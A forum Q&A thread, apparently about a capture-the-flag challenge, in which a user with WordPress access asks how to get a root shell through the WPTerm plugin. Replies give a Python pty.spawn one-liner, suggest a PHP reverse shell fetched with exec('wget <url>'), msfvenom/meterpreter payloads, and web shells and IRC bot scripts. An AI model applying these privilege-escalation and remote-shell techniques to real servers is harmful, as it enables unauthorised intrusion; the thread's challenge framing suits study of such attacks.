# Privilege Escalation Wordpress

Tags: linux, wordpress, privilege-escalation, root

I have access to a Wordpress blog and want to read the server's /root directory that belongs to the user "root" and not "www-data". I also know his password, but I can't open an interactive shell to be even asked about that bit of information..

Well, I have downloaded the plugin WPTerm, with which I can call python scripts or write php files to be executed in the front end, but I run into trouble due to the following issues:

```
sudo is not available: sh: 1: sudo: not found

su does not work: su: must be run from a terminal

ssh and nc are also not available
```

It seems that this webserver runs in a docker environment and the Loginizer plugin tells me, that the server has the private IP Address: Server's IP Address 172.18.0.6

How the hell do I spawn an interactive shell where I can bypass the "su: must be run from a terminal" error message? I seriously have no idea what to do next, maybe some kind of shellcode for php or python would work.

Comment: A note on the lack of `nc`, have you also checked for `ncat` and `netcat` as commands? And what happens if you run commands using `sh -c "command"`?

Comment: Why not use `script` to give the password to `su`?

Comment: Try uploading the PHP reverse shell from Pentest Monkey's:http://pentestmonkey.net/tools/web-shells/php-reverse-shell (you could try to use: ```exec('wget <url>');```

Answer (score 1):

Basically, you can try by starting a PTY shell:

```
echo "import pty; pty.spawn('/bin/bash')" > /tmp/abcd.py
python /tmp/abcd.py
```

After that, you could install sudo (but I think that it's not necessary because after su -, you are a root user) with:

```
su -
apt-get install sudo
```

Comment: Yeah but WPTerm is a non-interactive shell, which means that after I run the python command the application basically freezes. That's why I need a one-liner to start a shell with superuser rights and read the contents of the /root directory or change its owner/access rights.

Comment: Did you try a reverse shell (i.e. upload it as PHP script) and after that connect to it by using netcat?

Comment: @CipherX suggestion seems the most logical. I would however, use a meterpreter shell rather than netcat -- use msfvenom to generate the php.

Comment: Look up 'the reverse shell cheat sheet' it's a good reference. I also concur with using venom to craft a payload

Comment: I did this challenge too and the answer @CipherX gave in the comments is correct. The solution was to use a reverse shell.

Answer (score 0):

You could try to install bad scripts (*viruses*) after reading and adapt them:

- PHP Shell [PHP Shell](http://phpshell.sourceforge.net/) or [p0wny@shell](https://github.com/flozz/p0wny-shell)

  A webpage presenting a FORM with a lot of features, including command line.
- Perl IRC Bot [Warr1024/logbot.pl](https://gist.github.com/Warr1024/4298907) or [tlongren/bot.pl](https://gist.github.com/tlongren/afe81698cafaafcbe386)

  For this, a IRC server may be usefull. Read carefully the script and change IRC server, user and password...

Be carefull, playing with this kind of tools! Ensure you clearly understand what you do!

Comment: And have the proper (real world) permission to do so.